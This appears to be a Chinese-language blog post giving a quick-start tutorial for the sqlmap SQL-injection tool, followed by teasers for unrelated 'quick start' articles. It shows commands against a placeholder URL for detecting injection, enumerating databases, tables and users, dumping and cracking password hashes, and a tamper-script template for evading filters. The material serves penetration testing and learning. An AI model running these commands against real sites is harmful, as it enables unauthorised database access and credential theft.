sqlmap 快速開始

阿新 • • 發佈：2020-12-22

sqlmap 快速開始

目標

sqlmap 使用時必須指定一個目標。

判斷 `"http://www.target.com/vuln.php?id=1"` 是否存在注入

python sqlmap.py -u "http://www.target.com/vuln.php?id=1"

從檔案中讀取目標

python sqlmap.py -r 1.txt

1.txt 檔案格式（HTTP 請求報文）：

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1

【注意】如果請求使用的是 HTTPS 協議時，可以配合 --force-ssl

使用。或者在上文中的 Host 變數後新增 :443

利用

確認存在 sql 注入之後，進行資料查詢，或其他操作。

--dbs

當前使用者下的所有資料庫

sqlmap.py -u "target.com?id=1" --dbs

--tables

資料庫中所有表名

sqlmap.py -u "target.com?id=1" -D infomation_schema --tables

--columns

所有欄位名

sqlmap.py -u "target.com?id=1" -D infomation_schema -T tables --columns

--users

資料庫所有使用者

sqlmap.py -u "target.com?id=1" --users

--passwords

資料庫使用者密碼，SQLMap 會先列舉使用者，然後列出 Hash，並嘗試破解。

sqlmap.py -u "target.com?id=1" --passwords

--current-db

當前網站資料庫名

sqlmap.py -u "target.com?id=1" --current-db

--current-user

當前網站使用的資料庫使用者

sqlmap.py -u "target.com?id=1" --current-user

繞過

混淆注入資料

選項：--tamper="between,my.py"

python 檔案格式：

# Needed imports
from lib.core.enums import PRIORITY

# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL

def tamper(payload):
    '''
    Description of your tamper script
    '''

    retVal = payload

    # your code to tamper the original payload

    # return the tampered payload
    return retVal

其他

輸出詳情

選項：-v

python sqlmap.py -v 1

此選項共有 7 種引數，下為常用引數：

0 ：僅顯示錯誤和危險資訊，與 python 直譯器資訊。
1 ：顯示 information 和警告資訊。（預設值）
3 ：顯示 payload。

參考

Github 主頁
sqlmap - why (not how) it works? (slides) presented by Miroslav at Navaja Negra & ConectaCon in Albacete (Spain) on October 14th, 2015.

sqlmap 快速開始

sqlmap 快速開始目標 sqlmap 使用時必須指定一個目標。判斷 \"http://www.target.com/vuln.php?id=1\" 是否存在注入

Spring Boot（一）：快速開始

本系列文章旨在使用最小依賴、最簡單配置，幫助初學者快速掌握Spring Boot各元件使用，達到快速入門的目的。全部文章所使用示例程式碼均同步Github倉庫和Gitee倉庫。

【MyBatis-Plus-In-Action】二、快速開始——Spring整合Mybatis-Plus

由於MyBatis-Plus是在MyBatis的基礎上只做增強不做改變，因此其與Spring的整合非常簡單。只需把MyBatis的依賴換成MyBatis的依賴，再把sqlSessionFactory換成MyBatis-Plus的即可。下面讓我們在Spring中快速整合Mybati

Spring Cloud Gateway - 快速開始

Spring Cloud Gateway 工作原理客戶端向 Spring Cloud Gateway 發出請求，如果請求與閘道器程式定義的路由匹配，則將其傳送到閘道器 Web 處理程式，此處理程式執行特定的請求過濾器鏈。

小書MybatisPlus第1篇-整合SpringBoot快速開始增刪改查

MybatisPlus官方檔案已經很完善了，為什麼還要寫一個這樣的檔案？官方檔案注重知識結構的整理，沒有注重學習者的學習順序

Java匯出Excel快速開始

程式碼： 1 package com.scoremanager.utils; 2 3 import org.apache.poi.hssf.usermodel.*; 4 5 import javax.servlet.http.HttpServletResponse;

Java 分散式任務排程平臺：PowerJob 快速開始+配置詳解

本文適合有 Java 基礎知識的人群作者：HelloGitHub-Salieri 引言 HelloGitHub 推出的《講解開源專案》系列。

快速開始

快速開始目錄快速開始專案設定序列化器檢視路由分頁設定測試我們的 API 我們將建立一個簡單的API，以允許管理員使用者檢視和編輯系統中的使用者和組。

Spring Boot系列（一）：Spring Boot快速開始

一、Spring Boot介紹　　Spring Boot可以很容易的建立可直接執行的獨立的基於Spring的應用程式。

JDBC | 第一章: 快速開始使用JDBC連線Mysql資料庫?

開始使用基於java的JDBC技術來連線mysql進行msyql資料庫簡單的CRUD操作下載對應mysql驅動包

Drools-決策表使用1-快速開始

前言決策表（decision-table）即以xls表格的形式定義規則，而不再是隻有開發人員能看懂的drl文字。

SpringCloud Zipkin快速開始

Zipkin是什麼Zipkin分散式跟蹤系統；它可以幫助收集時間資料，解決在microservice架構下的延遲問題；它管理這些資料的收集和查詢；Zipkin的設計是基於谷歌的Google Dapper論文。

Mybatis-Plus快速開始

Mybatis-Plus雖然官網上有一個快速開始，但是實際操作有點問題，所以，自己寫了一個。

logstash7.9.1-官方教程1-快速開始

本文是對官方教程的實操+翻譯。機器配置 CentOS7.6，64位，16核，16GB [sysoper@10-99-10-31 ~]$ cat /etc/redhat-release

mmWave SDK快速開始

文章目錄 IntroductionProgramming mmWave devicesLoading images onto mmWave EVMDemonstration ModeCSS devolopment mode

kafka快速開始

技術標籤：kafka 一、建立一個topic 建立一個名為“test1”的topic，它有一個分割槽和一個副本，進入windows路徑下，執行

Scaled-YOLOv4 快速開始，訓練自定義資料集

程式碼： https://github.com/ikuokuo/start-scaled-yolov4 Scaled-YOLOv4 程式碼: https://github.com/WongKinYiu/ScaledYOLOv4

Detectron2 快速開始，使用 WebCam 測試

本文將引導快速使用 Detectron2 ，介紹用攝像頭測試實時目標檢測。 Detectron2: https://github.com/facebookresearch/detectron2

MMSkeleton 快速開始，使用 WebCam 測試

本文將引導快速使用 MMSkeleton ，介紹用攝像頭測試實時姿態估計。 MMSkeleton: https://github.com/open-mmlab/mmskeleton

Spring Cloud Gateway 快速開始並解決問題 Query Not Found 問題

1.pom.xml <?xml version=\"1.0\" encoding=\"UTF-8\"?> <project xmlns=\"http://maven.apache.org/POM/4.0.0\"